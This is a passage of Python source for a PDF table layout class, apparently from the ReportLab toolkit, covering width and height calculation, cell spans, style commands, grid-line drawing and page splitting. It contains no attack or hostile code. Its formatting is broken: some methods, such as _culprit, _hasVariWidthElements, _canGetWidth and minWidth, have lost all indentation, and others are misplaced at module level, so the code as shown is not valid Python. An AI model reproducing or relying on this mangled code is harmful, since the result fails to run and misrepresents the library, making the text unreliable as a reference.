        callers treat as an error for auto-width columns.
        """
        if isinstance(v,(list,tuple)):
            # A sequence of values: widest member wins; any unknown kills it.
            w = 0
            for e in v:
                ew = self._elementWidth(e,s)
                if ew is None: return None
                w = max(w,ew)
            return w
        elif isinstance(v,Flowable) and v._fixedWidth:
            if hasattr(v, 'width') and isinstance(v.width,(int,float)): return v.width
            if hasattr(v, 'drawWidth') and isinstance(v.drawWidth,(int,float)): return v.drawWidth
        # Even if something is fixedWidth, the attribute to check is not
        # necessarily consistent (cf. Image.drawWidth). Therefore, we'll
        # be extra-careful and fall through to this code if necessary.
        if hasattr(v, 'minWidth'):
            try:
                w = v.minWidth() # should be all flowables
                if isinstance(w,(float,int)): return w
            except AttributeError:
                pass
        if v is None:
            return 0
        else:
            # Fall back to measuring the string form, line by line.
            try:
                v = str(v).split("\n")
            except:
                return 0
            fontName = s.fontname
            fontSize = s.fontsize
            return max([stringWidth(x,fontName,fontSize) for x in v])
    def _calc_height(self, availHeight, availWidth, H=None, W=None):
        """Resolve self._rowHeights and self._rowpositions, computing any
        None row heights from content.

        With longTableOptimize the sizing stops early once the accumulated
        height exceeds availHeight and all spans are settled; self._hmax
        records how many rows were actually sized.
        """
        H = self._argH
        if not W: W = _calc_pc(self._argW,availWidth) #widths array
        hmax = lim = len(H)
        longTable = self._longTableOptimize
        if None in H:
            canv = getattr(self,'canv',None)
            saved = None
            #get a handy list of any cells which span rows. should be ignored for sizing
            if self._spanCmds:
                rowSpanCells = self._rowSpanCells
                colSpanCells = self._colSpanCells
                spanRanges = self._spanRanges
                colpositions = self._colpositions
            else:
                rowSpanCells = colSpanCells = ()
                spanRanges = {}
            if canv: saved = canv._fontname, canv._fontsize, canv._leading
            H0 = H
            H = H[:]    #make a copy as we'll change it
            self._rowHeights = H
            spanCons = {}   # (row0,row1) -> min total height needed by a span
            FUZZ = rl_config._FUZZ
            while None in H:
                i = H.index(None)
                V = self._cellvalues[i] # values for row i
                S = self._cellStyles[i] # styles for row i
                h = 0
                j = 0
                for j,(v, s, w) in enumerate(list(zip(V, S, W))): # value, style, width (lengths must match)
                    ji = j,i
                    span = spanRanges.get(ji,None)
                    if ji in rowSpanCells and not span:
                        continue # don't count it, it's either occluded or unreliable
                    else:
                        if isinstance(v,(tuple,list,Flowable)):
                            if isinstance(v,Flowable): v = (v,)
                            else: v = flatten(v)
                            v = V[j] = self._cellListProcess(v,w,None)
                            if w is None and not self._canGetWidth(v):
                                raise ValueError("Flowable %s in cell(%d,%d) can't have auto width in\n%s" % (v[0].identity(30),i,j,self.identity(30)))
                            # Temporarily impose the cell font on the canvas
                            # so wrapping metrics match the final draw.
                            if canv: canv._fontname, canv._fontsize, canv._leading = s.fontname, s.fontsize, s.leading or 1.2*s.fontsize
                            if ji in colSpanCells:
                                if not span: continue
                                # Widen to the full spanned column extent.
                                w = max(colpositions[span[2]+1]-colpositions[span[0]],w)
                            dW,t = self._listCellGeom(v,w or self._listValueWidth(v),s)
                            if canv: canv._fontname, canv._fontsize, canv._leading = saved
                            dW = dW + s.leftPadding + s.rightPadding
                            if not rl_config.allowTableBoundsErrors and dW>w:
                                from reportlab.platypus.doctemplate import LayoutError
                                raise LayoutError("Flowable %s (%sx%s points) too wide for cell(%d,%d) (%sx* points) in\n%s" % (v[0].identity(30),fp_str(dW),fp_str(t),i,j, fp_str(w), self.identity(30)))
                        else:
                            # Plain string: height is line count times leading.
                            v = (v is not None and str(v) or '').split("\n")
                            t = (s.leading or 1.2*s.fontsize)*len(v)
                        t += s.bottomPadding+s.topPadding
                        if span:
                            r0 = span[1]
                            r1 = span[3]
                            if r0!=r1:
                                # Height needed by a multi-row span is
                                # distributed later by spanFixDim.
                                x = r0,r1
                                spanCons[x] = max(spanCons.get(x,t),t)
                                t = 0
                    if t>h: h = t   #record a new maximum
                H[i] = h
                # we can stop if we have filled up all available room
                if longTable:
                    hmax = i
                    height = sum(H[:i])
                    if height > availHeight:
                        #we can terminate if all spans are complete in H[:i]
                        if spanCons:
                            msr = max([x[1] for x in spanCons.keys()]) #RS=[endrowspan,.....]
                            if hmax>=msr:
                                break
            if None not in H: hmax = lim
            if spanCons:
                try:
                    spanFixDim(H0,H,spanCons,lim=hmax)
                except:
                    annotateException('\nspanning problem in %s hmax=%s lim=%s avail=%s x %s\nH0=%r H=%r\nspanCons=%r' % (self.identity(),hmax,lim,availWidth,availHeight,H0,H,spanCons))
        height = self._height = sum(H[:hmax])
        self._rowpositions = [height]    # index 0 is actually topline; we skip when processing cells
        for h in H[:hmax]:
            height -= h
            self._rowpositions.append(height)
        assert abs(height)<1e-8, '!!!!!%s\ninternal height error height=%r hmax=%d Sum(H[:%d])=%r\nH=%r\nrowPositions=%r' % (self.identity(),height,hmax,hmax,self._height,H[:hmax],self._rowpositions)
        self._hmax = hmax
    def _calc(self, availWidth, availHeight):
        """Compute column widths, row heights and span rects for this table."""
        #if hasattr(self,'_width'): return
        #in some cases there are unsizable things in
        #cells. If so, apply a different algorithm
        #and assign some withs in a less (thanks to Gary Poster) dumb way.
        #this CHANGES the widths array.
        if (None in self._colWidths or '*' in self._colWidths) and self._hasVariWidthElements():
            W = self._calcPreliminaryWidths(availWidth) #widths
        else:
            W = None
        # need to know which cells are part of spanned
        # ranges, so _calc_height and _calc_width can ignore them
        # in sizing
        if self._spanCmds:
            self._calcSpanRanges()
            if None in self._argH:
                # auto row heights in a spanned table need the column grid first
                self._calc_width(availWidth,W=W)
        if self._nosplitCmds:
            self._calcNoSplitRanges()
        # calculate the full table height
        self._calc_height(availHeight,availWidth,W=W)
        # calculate the full table width
        self._calc_width(availWidth,W=W)
        if self._spanCmds:
            #now work out the actual rect for each spanned cell from the underlying grid
            self._calcSpanRects()
def _culprit(self):
"""Return a string describing the tallest element.
Usually this is what causes tables to fail to split. Currently
tables are the only items to have a '_culprit' method. Doctemplate
checks for it.
"""
rh = self._rowHeights
tallest = max(rh)
rowNum = rh.index(tallest)
#rowNum of limited interest as usually it's a split one
#and we see row #1. Text might be a nice addition.
return 'tallest cell %0.1f points' % tallest
def _hasVariWidthElements(self, upToRow=None):
"""Check for flowables in table cells and warn up front.
Allow a couple which we know are fixed size such as
images and graphics."""
if upToRow is None: upToRow = self._nrows
for row in range(min(self._nrows, upToRow)):
for col in range(self._ncols):
value = self._cellvalues[row][col]
if not self._canGetWidth(value):
return 1
return 0
def _canGetWidth(self, thing):
"Can we work out the width quickly?"
if isinstance(thing,(list, tuple)):
for elem in thing:
if not self._canGetWidth(elem):
return 0
return 1
elif isinstance(thing, Flowable):
return thing._fixedWidth # must loosen this up
else: #str, number, None etc.
#anything else gets passed to str(...)
# so should be sizable
return 1
    def _calcPreliminaryWidths(self, availWidth):
        """Fallback algorithm for when main one fails.
        Where exact width info not given but things like
        paragraphs might be present, do a preliminary scan
        and assign some best-guess values."""
        W = list(self._argW) # _calc_pc(self._argW,availWidth)
        verbose = 0
        totalDefined = 0.0
        percentDefined = 0
        percentTotal = 0
        numberUndefined = 0
        numberGreedyUndefined = 0
        # First pass: classify every width spec (number / None / '*' / 'nn%').
        for w in W:
            if w is None:
                numberUndefined += 1
            elif w == '*':
                numberUndefined += 1
                numberGreedyUndefined += 1
            elif _endswith(w,'%'):
                percentDefined += 1
                percentTotal += float(w[:-1])
            else:
                assert isinstance(w,(int,float))
                totalDefined = totalDefined + w
        if verbose: print('prelim width calculation.  %d columns, %d undefined width, %0.2f units remain' % (
            self._ncols, numberUndefined, availWidth - totalDefined))
        #check columnwise in each None column to see if they are sizable.
        given = []
        sizeable = []
        unsizeable = []
        minimums = {}
        totalMinimum = 0
        elementWidth = self._elementWidth
        for colNo in range(self._ncols):
            w = W[colNo]
            if w is None or w=='*' or _endswith(w,'%'):
                # Variable column: its minimum is the widest cell content.
                siz = 1
                final = 0
                for rowNo in range(self._nrows):
                    value = self._cellvalues[rowNo][colNo]
                    style = self._cellStyles[rowNo][colNo]
                    pad = style.leftPadding+style.rightPadding
                    new = elementWidth(value,style)
                    if new:
                        new += pad
                    else:
                        new = pad
                    # NOTE(review): left/right padding appears to be added a
                    # second time here (pad was already added above) -- kept
                    # as-is; confirm against upstream reportlab before changing.
                    new += style.leftPadding+style.rightPadding
                    final = max(final, new)
                    siz = siz and self._canGetWidth(value) # irrelevant now?
                if siz:
                    sizeable.append(colNo)
                else:
                    unsizeable.append(colNo)
                minimums[colNo] = final
                totalMinimum += final
            else:
                given.append(colNo)
        if len(given) == self._ncols:
            # Every column already has an explicit width; nothing to do.
            return
        if verbose: print('predefined width:   ',given)
        if verbose: print('uncomputable width: ',unsizeable)
        if verbose: print('computable width:   ',sizeable)
        # how much width is left:
        remaining = availWidth - (totalMinimum + totalDefined)
        if remaining > 0:
            # we have some room left; fill it.
            definedPercentage = (totalDefined/availWidth)*100
            percentTotal += definedPercentage
            if numberUndefined and percentTotal < 100:
                undefined = numberGreedyUndefined or numberUndefined
                defaultWeight = (100-percentTotal)/undefined
                percentTotal = 100
                defaultDesired = (defaultWeight/percentTotal)*availWidth
            else:
                defaultWeight = defaultDesired = 1
            # we now calculate how wide each column wanted to be, and then
            # proportionately shrink that down to fit the remaining available
            # space.  A column may not shrink less than its minimum width,
            # however, which makes this a bit more complicated.
            desiredWidths = []
            totalDesired = 0
            effectiveRemaining = remaining
            for colNo, minimum in minimums.items():
                w = W[colNo]
                if _endswith(w,'%'):
                    desired = (float(w[:-1])/percentTotal)*availWidth
                elif w == '*':
                    desired = defaultDesired
                else:
                    desired = not numberGreedyUndefined and defaultDesired or 1
                if desired <= minimum:
                    W[colNo] = minimum
                else:
                    desiredWidths.append(
                        (desired-minimum, minimum, desired, colNo))
                    totalDesired += desired
                    effectiveRemaining += minimum
            if desiredWidths: # else we're done
                # let's say we have two variable columns.  One wanted
                # 88 points, and one wanted 264 points.  The first has a
                # minWidth of 66, and the second of 55.  We have 71 points
                # to divide up in addition to the totalMinimum (i.e.,
                # remaining==71).  Our algorithm tries to keep the proportion
                # of these variable columns.
                #
                # To do this, we add up the minimum widths of the variable
                # columns and the remaining width.  That's 192.  We add up the
                # totalDesired width.  That's 352.  That means we'll try to
                # shrink the widths by a proportion of 192/352--.545454.
                # That would make the first column 48 points, and the second
                # 144 points--adding up to the desired 192.
                #
                # Unfortunately, that's too small for the first column.  It
                # must be 66 points.  Therefore, we go ahead and save that
                # column width as 88 points.  That leaves (192-88==) 104
                # points remaining.  The proportion to shrink the remaining
                # column is (104/264), which, multiplied  by the desired
                # width of 264, is 104: the amount assigned to the remaining
                # column.
                proportion = effectiveRemaining/totalDesired
                # we sort the desired widths by difference between desired and
                # and minimum values, a value called "disappointment" in the
                # code.  This means that the columns with a bigger
                # disappointment will have a better chance of getting more of
                # the available space.
                desiredWidths.sort()
                finalSet = []
                for disappointment, minimum, desired, colNo in desiredWidths:
                    adjusted = proportion * desired
                    if adjusted < minimum:
                        # Clamp to the minimum and redistribute what's left.
                        W[colNo] = minimum
                        totalDesired -= desired
                        effectiveRemaining -= minimum
                        if totalDesired:
                            proportion = effectiveRemaining/totalDesired
                    else:
                        finalSet.append((minimum, desired, colNo))
                for minimum, desired, colNo in finalSet:
                    adjusted = proportion * desired
                    assert adjusted >= minimum
                    W[colNo] = adjusted
        else:
            # No spare room: every variable column gets exactly its minimum.
            for colNo, minimum in minimums.items():
                W[colNo] = minimum
        if verbose: print('new widths are:', W)
        self._argW = self._colWidths = W
        return W
def minWidth(self):
W = list(self._argW)
width = 0
elementWidth = self._elementWidth
rowNos = range(self._nrows)
values = self._cellvalues
styles = self._cellStyles
for colNo in range(len(W)):
w = W[colNo]
if w is None or w=='*' or _endswith(w,'%'):
final = 0
for rowNo in rowNos:
value = values[rowNo][colNo]
style = styles[rowNo][colNo]
new = (elementWidth(value,style)+
style.leftPadding+style.rightPadding)
final = max(final, new)
width += final
else:
width += float(w)
return width # XXX + 1/2*(left and right border widths)
    def _calcSpanRanges(self):
        """Work out rects for tables which do row and column spanning.
        This creates some mappings to let the later code determine
        if a cell is part of a "spanned" range.
        self._spanRanges shows the 'coords' in integers of each
        'cell range', or None if it was clobbered:
        (col, row) -> (col0, row0, col1, row1)
        Any cell not in the key is not part of a spanned region
        """
        # Start with every cell spanning only itself.
        self._spanRanges = spanRanges = {}
        for x in range(self._ncols):
            for y in range(self._nrows):
                spanRanges[x,y] = (x, y, x, y)
        self._colSpanCells = []
        self._rowSpanCells = []
        csa = self._colSpanCells.append
        rsa = self._rowSpanCells.append
        for (cmd, start, stop) in self._spanCmds:
            x0, y0 = start
            x1, y1 = stop
            #normalize negative indices and reversed corners
            if x0 < 0: x0 = x0 + self._ncols
            if x1 < 0: x1 = x1 + self._ncols
            if y0 < 0: y0 = y0 + self._nrows
            if y1 < 0: y1 = y1 + self._nrows
            if x0 > x1: x0, x1 = x1, x0
            if y0 > y1: y0, y1 = y1, y0
            if x0!=x1 or y0!=y1:
                if x0!=x1: #column span
                    for y in range(y0, y1+1):
                        for x in range(x0,x1+1):
                            csa((x,y))
                if y0!=y1: #row span
                    for y in range(y0, y1+1):
                        for x in range(x0,x1+1):
                            rsa((x,y))
                # Clobber every covered cell, then restore the master entry.
                for y in range(y0, y1+1):
                    for x in range(x0,x1+1):
                        spanRanges[x,y] = None
                # set the main entry
                spanRanges[x0,y0] = (x0, y0, x1, y1)
def _calcNoSplitRanges(self):
    """
    This creates some mappings to let the later code determine
    if a cell is part of a "nosplit" range.
    self._nosplitRanges shows the 'coords' in integers of each
    'cell range', or None if it was clobbered:
      (col, row) -> (col0, row0, col1, row1)
    Any cell not in the key is not part of a spanned region.

    Mirror image of _calcSpanRanges, but driven by NOSPLIT commands.
    """
    self._nosplitRanges = nosplitRanges = {}
    # start with every cell covering exactly itself
    for x in range(self._ncols):
        for y in range(self._nrows):
            nosplitRanges[x,y] = (x, y, x, y)
    self._colNoSplitCells = []
    self._rowNoSplitCells = []
    csa = self._colNoSplitCells.append
    rsa = self._rowNoSplitCells.append
    for (cmd, start, stop) in self._nosplitCmds:
        x0, y0 = start
        x1, y1 = stop
        #normalize negative indices and reversed corners
        if x0 < 0: x0 = x0 + self._ncols
        if x1 < 0: x1 = x1 + self._ncols
        if y0 < 0: y0 = y0 + self._nrows
        if y1 < 0: y1 = y1 + self._nrows
        if x0 > x1: x0, x1 = x1, x0
        if y0 > y1: y0, y1 = y1, y0
        if x0!=x1 or y0!=y1:
            #column span
            if x0!=x1:
                for y in range(y0, y1+1):
                    for x in range(x0,x1+1):
                        csa((x,y))
            #row span
            if y0!=y1:
                for y in range(y0, y1+1):
                    for x in range(x0,x1+1):
                        rsa((x,y))
            # clobber every covered cell, then restore the top-left one
            for y in range(y0, y1+1):
                for x in range(x0,x1+1):
                    nosplitRanges[x,y] = None
            # set the main entry
            nosplitRanges[x0,y0] = (x0, y0, x1, y1)
def _calcSpanRects(self):
    """Work out rects for tables which do row and column spanning.

    Based on self._spanRanges, which is already known,
    and the widths which were given or previously calculated,
    self._spanRects shows the real coords for drawing:
      (col, row) -> (x, y, width, height)
    for each cell.  Any cell which 'does not exist' as another
    has spanned over it will get a None entry on the right.

    Also records _vBlocks/_hBlocks: the column/row grid positions that
    spans cross, so _drawLines can skip grid segments inside a span.
    """
    spanRects = getattr(self,'_spanRects',{})
    hmax = getattr(self,'_hmax',None)
    longTable = self._longTableOptimize
    # already computed for this height (long-table case caches per hmax)
    if spanRects and (longTable and hmax==self._hmax_spanRects or not longTable):
        return
    colpositions = self._colpositions
    rowpositions = self._rowpositions
    vBlocks = {}
    hBlocks = {}
    rlim = len(rowpositions)-1
    for (coord, value) in self._spanRanges.items():
        if value is None:
            spanRects[coord] = None
        else:
            col0, row0, col1, row1 = value
            if row1>=rlim: continue   # span runs past the laid-out rows
            col,row = coord
            if col1-col0>0:
                # record interior column boundaries blocked by this span
                for _ in range(col0+1,col1+1):
                    vBlocks.setdefault(colpositions[_],[]).append((rowpositions[row1+1],rowpositions[row0]))
            if row1-row0>0:
                # record interior row boundaries blocked by this span
                for _ in range(row0+1,row1+1):
                    hBlocks.setdefault(rowpositions[_],[]).append((colpositions[col0],colpositions[col1+1]))
            x = colpositions[col0]
            y = rowpositions[row1+1]
            width = colpositions[col1+1] - x
            height = rowpositions[row0] - y
            spanRects[coord] = (x, y, width, height)
    for _ in hBlocks, vBlocks:
        for value in _.values():
            value.sort()
    self._spanRects = spanRects
    self._vBlocks = vBlocks
    self._hBlocks = hBlocks
    self._hmax_spanRects = hmax
def setStyle(self, tblstyle):
    """Apply *tblstyle* (a TableStyle, or a raw command list) to the table."""
    if not isinstance(tblstyle,TableStyle):
        # convenience: accept a plain list/tuple of commands
        tblstyle = TableStyle(tblstyle)
    for cmd in tblstyle.getCommands():
        self._addCommand(cmd)
    for k,v in tblstyle._opts.items():
        setattr(self,k,v)
    for a in ('spaceBefore','spaceAfter'):
        # inherit flowable spacing from the style unless already set on self
        if not hasattr(self,a) and hasattr(tblstyle,a):
            setattr(self,a,getattr(tblstyle,a))
def _addCommand(self,cmd):
    """Route a single style command to the right internal command list.

    Line commands are normalised to 10-tuples
    (op, start, stop, weight, color, cap, dash, join, count, space)
    before being stored; everything else is applied to cell styles
    immediately.
    """
    if cmd[0] in ('BACKGROUND','ROWBACKGROUNDS','COLBACKGROUNDS'):
        self._bkgrndcmds.append(cmd)
    elif cmd[0] == 'SPAN':
        self._spanCmds.append(cmd)
    elif cmd[0] == 'NOSPLIT':
        # we expect op, start, stop
        self._nosplitCmds.append(cmd)
    elif _isLineCommand(cmd):
        # we expect op, start, stop, weight, colour, cap, dashes, join
        cmd = list(cmd)
        if len(cmd)<5: raise ValueError('bad line command '+ascii(cmd))
        #determine line cap value at position 5. This can be str or numeric.
        if len(cmd)<6:
            cmd.append(1)
        else:
            cap = _convert2int(cmd[5], LINECAPS, 0, 2, 'cap', cmd)
            cmd[5] = cap
        #dashes at index 6 - this is a dash array:
        if len(cmd)<7: cmd.append(None)
        #join mode at index 7 - can be str or numeric, look up as for caps
        if len(cmd)<8: cmd.append(1)
        else:
            join = _convert2int(cmd[7], LINEJOINS, 0, 2, 'join', cmd)
            cmd[7] = join
        #linecount at index 8. Default is 1, set to 2 for double line.
        if len(cmd)<9: cmd.append(1)
        else:
            lineCount = cmd[8]
            if lineCount is None:
                lineCount = 1
                cmd[8] = lineCount
            assert lineCount >= 1
        #linespacing at index 9. Not applicable unless 2+ lines, defaults to line
        #width so you get a visible gap between centres
        if len(cmd)<10: cmd.append(cmd[3])
        else:
            space = cmd[9]
            if space is None:
                space = cmd[3]
                cmd[9] = space
        assert len(cmd) == 10
        self._linecmds.append(tuple(cmd))
    else:
        # cell-formatting command: apply to every cell in the rectangle
        (op, (sc, sr), (ec, er)), values = cmd[:3] , cmd[3:]
        if sc < 0: sc = sc + self._ncols
        if ec < 0: ec = ec + self._ncols
        if sr < 0: sr = sr + self._nrows
        if er < 0: er = er + self._nrows
        for i in range(sr, er+1):
            for j in range(sc, ec+1):
                _setCellStyle(self._cellStyles, i, j, op, values)
def _drawLines(self):
    """Replay all stored line commands onto the canvas.

    Tracks the current cap/dash/join canvas state so it is only changed
    when a command actually differs from the previous one.
    """
    ccap, cdash, cjoin = None, None, None
    self.canv.saveState()
    for op, (sc,sr), (ec,er), weight, color, cap, dash, join, count, space in self._linecmds:
        # 'splitfirst'/'splitlast' markers are resolved in _splitRows
        if isinstance(sr,strTypes) and sr.startswith('split'): continue
        if sc < 0: sc = sc + self._ncols
        if ec < 0: ec = ec + self._ncols
        if sr < 0: sr = sr + self._nrows
        if er < 0: er = er + self._nrows
        if cap!=None and ccap!=cap:
            self.canv.setLineCap(cap)
            ccap = cap
        if dash is None or dash == []:
            if cdash is not None:
                self.canv.setDash()
                cdash = None
        elif dash != cdash:
            self.canv.setDash(dash)
            cdash = dash
        if join is not None and cjoin!=join:
            self.canv.setLineJoin(join)
            cjoin = join
        # dispatch to the drawing method registered for this op
        getattr(self,_LineOpMap.get(op, '_drawUnknown' ))( (sc, sr), (ec, er), weight, color, count, space)
    self.canv.restoreState()
    self._curcolor = None
def _drawUnknown(self, start, end, weight, color, count, space):
    """Fallback for unrecognised line ops: raise with the offending name.

    NOTE: recovers the op name from the caller's frame, so this must only
    ever be invoked from _drawLines (one level up the stack).
    """
    #we are only called from _drawLines which is one level up
    import sys
    op = sys._getframe(1).f_locals['op']
    raise ValueError("Unknown line command '%s'" % op)
def _drawGrid(self, start, end, weight, color, count, space):
    """Draw a GRID: the outer box plus all interior grid lines."""
    self._drawBox( start, end, weight, color, count, space)
    self._drawInnerGrid( start, end, weight, color, count, space)
def _drawBox(self, start, end, weight, color, count, space):
    """Draw the four outer border lines of the cell rectangle start..end."""
    sc,sr = start
    ec,er = end
    self._drawHLines((sc, sr), (ec, sr), weight, color, count, space)      # top
    self._drawHLines((sc, er+1), (ec, er+1), weight, color, count, space)  # bottom
    self._drawVLines((sc, sr), (sc, er), weight, color, count, space)      # left
    self._drawVLines((ec+1, sr), (ec+1, er), weight, color, count, space)  # right
def _drawInnerGrid(self, start, end, weight, color, count, space):
    """Draw only the interior grid lines (no outer border) for start..end."""
    sc,sr = start
    ec,er = end
    self._drawHLines((sc, sr+1), (ec, er), weight, color, count, space)
    self._drawVLines((sc+1, sr), (ec, er), weight, color, count, space)
def _prepLine(self, weight, color):
    """Set stroke colour/width on the canvas, skipping redundant calls."""
    if color != self._curcolor:
        self.canv.setStrokeColor(color)
        self._curcolor = color
    if weight != self._curweight:
        self.canv.setLineWidth(weight)
        self._curweight = weight
def _drawHLines(self, start, end, weight, color, count, space):
    """Draw horizontal lines above rows start..end, honouring span blocks.

    *count* > 1 draws multiple parallel lines separated by weight+space.
    """
    sc,sr = start
    ec,er = end
    ecp = self._colpositions[sc:ec+2]
    rp = self._rowpositions[sr:er+1]
    if len(ecp)<=1 or len(rp)<1: return   # nothing visible to draw
    self._prepLine(weight, color)
    scp = ecp[0]
    ecp = ecp[-1]
    hBlocks = getattr(self,'_hBlocks',{})   # spans that interrupt the line
    canvLine = self.canv.line
    if count == 1:
        for y in rp:
            _hLine(canvLine, scp, ecp, y, hBlocks)
    else:
        # multi-line: delegate each segment to _multiLine
        lf = lambda x0,y0,x1,y1,canvLine=canvLine, ws=weight+space, count=count: _multiLine(x0,x1,y0,canvLine,ws,count)
        for y in rp:
            _hLine(lf, scp, ecp, y, hBlocks)
def _drawHLinesB(self, start, end, weight, color, count, space):
    """Draw horizontal lines *below* rows start..end (LINEBELOW)."""
    sc,sr = start
    ec,er = end
    self._drawHLines((sc, sr+1), (ec, er+1), weight, color, count, space)
def _drawVLines(self, start, end, weight, color, count, space):
    """Draw vertical lines to the left of columns start..end.

    Reuses the horizontal-line machinery by swapping x/y in the canvas
    callable, with _vBlocks supplying the span interruptions.
    """
    sc,sr = start
    ec,er = end
    erp = self._rowpositions[sr:er+2]
    cp = self._colpositions[sc:ec+1]
    if len(erp)<=1 or len(cp)<1: return   # nothing visible to draw
    self._prepLine(weight, color)
    srp = erp[0]
    erp = erp[-1]
    vBlocks = getattr(self,'_vBlocks',{})   # spans that interrupt the line
    # adapter: _hLine works in (start, end, fixed) order; swap to x/y
    canvLine = lambda y0, x0, y1, x1, _line=self.canv.line: _line(x0,y0,x1,y1)
    if count == 1:
        for x in cp:
            _hLine(canvLine, erp, srp, x, vBlocks)
    else:
        lf = lambda x0,y0,x1,y1,canvLine=canvLine, ws=weight+space, count=count: _multiLine(x0,x1,y0,canvLine,ws,count)
        for x in cp:
            _hLine(lf, erp, srp, x, vBlocks)
def _drawVLinesA(self, start, end, weight, color, count, space):
    """Draw vertical lines *after* (to the right of) columns start..end."""
    sc,sr = start
    ec,er = end
    self._drawVLines((sc+1, sr), (ec+1, er), weight, color, count, space)
def wrap(self, availWidth, availHeight):
    """Flowable protocol: lay the table out and return (width, height)."""
    self._calc(availWidth, availHeight)
    self.availWidth = availWidth
    return (self._width, self._height)
def onSplit(self,T,byRow=1):
    '''
    This method will be called when the Table is split.
    Special purpose tables can override to do special stuff.

    *T* is one of the resulting half-tables; the default is a no-op.
    '''
    pass
def _cr_0(self,n,cmds):
    """Copy *cmds* onto self, clipped to rows < n (top half after a split)."""
    for c in cmds:
        c = tuple(c)
        (sc,sr), (ec,er) = c[1:3]
        # drop commands that start below the split (or use string markers)
        if isinstance(sr,strTypes) or sr>=n: continue
        if er>=n: er = n-1   # clip end row to the last kept row
        self._addCommand((c[0],)+((sc, sr), (ec, er))+c[3:])
def _cr_1_1(self,n,repeatRows, cmds):
    """Copy *cmds* onto the lower half of a split table that keeps
    *repeatRows* header rows: rows n.. are shifted up to follow the
    repeated header, and row indices in each command are remapped."""
    for c in cmds:
        c = tuple(c)
        (sc,sr), (ec,er) = c[1:3]
        if sr in ('splitfirst','splitlast'): self._addCommand(c)
        else:
            # entirely inside the dropped region (header < row < n): skip
            if sr>=0 and sr>=repeatRows and sr<n and er>=0 and er<n: continue
            if sr>=repeatRows and sr<n: sr=repeatRows
            elif sr>=repeatRows and sr>=n: sr=sr+repeatRows-n
            if er>=repeatRows and er<n: er=repeatRows
            elif er>=repeatRows and er>=n: er=er+repeatRows-n
            self._addCommand((c[0],)+((sc, sr), (ec, er))+c[3:])
def _cr_1_0(self,n,cmds):
    """Copy *cmds* onto the lower half of a split table with no repeated
    header rows: row indices are shifted down by n."""
    for c in cmds:
        c = tuple(c)
        (sc,sr), (ec,er) = c[1:3]
        if sr in ('splitfirst','splitlast'): self._addCommand(c)
        else:
            if er>=0 and er<n: continue   # entirely in the top half: skip
            if sr>=0 and sr<n: sr=0       # clamp start into the new table
            if sr>=n: sr = sr-n
            if er>=n: er = er-n
            self._addCommand((c[0],)+((sc, sr), (ec, er))+c[3:])
def _splitRows(self,availHeight):
    """Split the table at the first allowed row boundary fitting availHeight.

    Returns [] when no split is possible, [self] when everything fits,
    or [R0, R1] where R0 holds rows 0..n-1 and R1 the remaining rows
    (prefixed with any repeatRows header rows).  All line, background,
    span and nosplit commands are rewritten so each half draws correctly
    on its own.
    """
    n=self._getFirstPossibleSplitRowPosition(availHeight)
    if n<=self.repeatRows: return []
    lim = len(self._rowHeights)
    if n==lim: return [self]   # whole table fits; no split needed
    repeatRows = self.repeatRows
    repeatCols = self.repeatCols
    splitByRow = self.splitByRow
    data = self._cellvalues
    #we're going to split into two superRows
    ident = self.ident
    if ident: ident = IdentStr(ident)
    R0 = self.__class__( data[:n], colWidths=self._colWidths, rowHeights=self._argH[:n],
            repeatRows=repeatRows, repeatCols=repeatCols,
            splitByRow=splitByRow, normalizedData=1, cellStyles=self._cellStyles[:n],
            ident=ident)
    #copy the commands
    A = []
    # hack up the line commands so each half gets the right borders
    for op, (sc,sr), (ec,er), weight, color, cap, dash, join, count, space in self._linecmds:
        if isinstance(sr,strTypes) and sr.startswith('split'):
            # keep the marker command itself, then resolve it for this split
            A.append((op,(sc,sr), (ec,sr), weight, color, cap, dash, join, count, space))
            if sr=='splitlast':
                sr = er = n-1
            elif sr=='splitfirst':
                sr = n
                er = n
        if sc < 0: sc = sc + self._ncols
        if ec < 0: ec = ec + self._ncols
        if sr < 0: sr = sr + self._nrows
        if er < 0: er = er + self._nrows
        if op in ('BOX','OUTLINE','GRID'):
            if sr<n and er>=n:
                # we have to split the BOX into its four open edges
                A.append(('LINEABOVE',(sc,sr), (ec,sr), weight, color, cap, dash, join, count, space))
                A.append(('LINEBEFORE',(sc,sr), (sc,er), weight, color, cap, dash, join, count, space))
                A.append(('LINEAFTER',(ec,sr), (ec,er), weight, color, cap, dash, join, count, space))
                A.append(('LINEBELOW',(sc,er), (ec,er), weight, color, cap, dash, join, count, space))
                if op=='GRID':
                    A.append(('LINEBELOW',(sc,n-1), (ec,n-1), weight, color, cap, dash, join, count, space))
                    A.append(('LINEABOVE',(sc,n), (ec,n), weight, color, cap, dash, join, count, space))
                    A.append(('INNERGRID',(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
            else:
                A.append((op,(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
        elif op in ('INNERGRID','LINEBELOW'):
            # BUGFIX (matches upstream reportlab): this branch previously
            # matched 'LINEABOVE' - making the dedicated LINEABOVE branch
            # below unreachable - and the old separate LINEBELOW branch
            # appended a truncated 5-tuple, silently losing the
            # cap/dash/join/count/space attributes across a page split.
            if sr<n and er>=n:
                # close off the bottom of the top half / top of the bottom half
                A.append(('LINEBELOW',(sc,n-1), (ec,n-1), weight, color, cap, dash, join, count, space))
                A.append(('LINEABOVE',(sc,n), (ec,n), weight, color, cap, dash, join, count, space))
            A.append((op,(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
        elif op == 'LINEABOVE':
            if sr<=n and er>=n:
                A.append(('LINEBELOW',(sc,n-1), (ec,n-1), weight, color, cap, dash, join, count, space))
            A.append((op,(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
        else:
            A.append((op,(sc,sr), (ec,er), weight, color, cap, dash, join, count, space))
    R0._cr_0(n,A)
    R0._cr_0(n,self._bkgrndcmds)
    R0._cr_0(n,self._spanCmds)
    R0._cr_0(n,self._nosplitCmds)
    if ident: ident = IdentStr(ident)
    if repeatRows:
        # bottom half carries a copy of the repeated header rows
        R1 = self.__class__(data[:repeatRows]+data[n:],colWidths=self._colWidths,
                rowHeights=self._argH[:repeatRows]+self._argH[n:],
                repeatRows=repeatRows, repeatCols=repeatCols,
                splitByRow=splitByRow, normalizedData=1,
                cellStyles=self._cellStyles[:repeatRows]+self._cellStyles[n:],
                ident=ident,
                )
        R1._cr_1_1(n,repeatRows,A)
        R1._cr_1_1(n,repeatRows,self._bkgrndcmds)
        R1._cr_1_1(n,repeatRows,self._spanCmds)
        R1._cr_1_1(n,repeatRows,self._nosplitCmds)
    else:
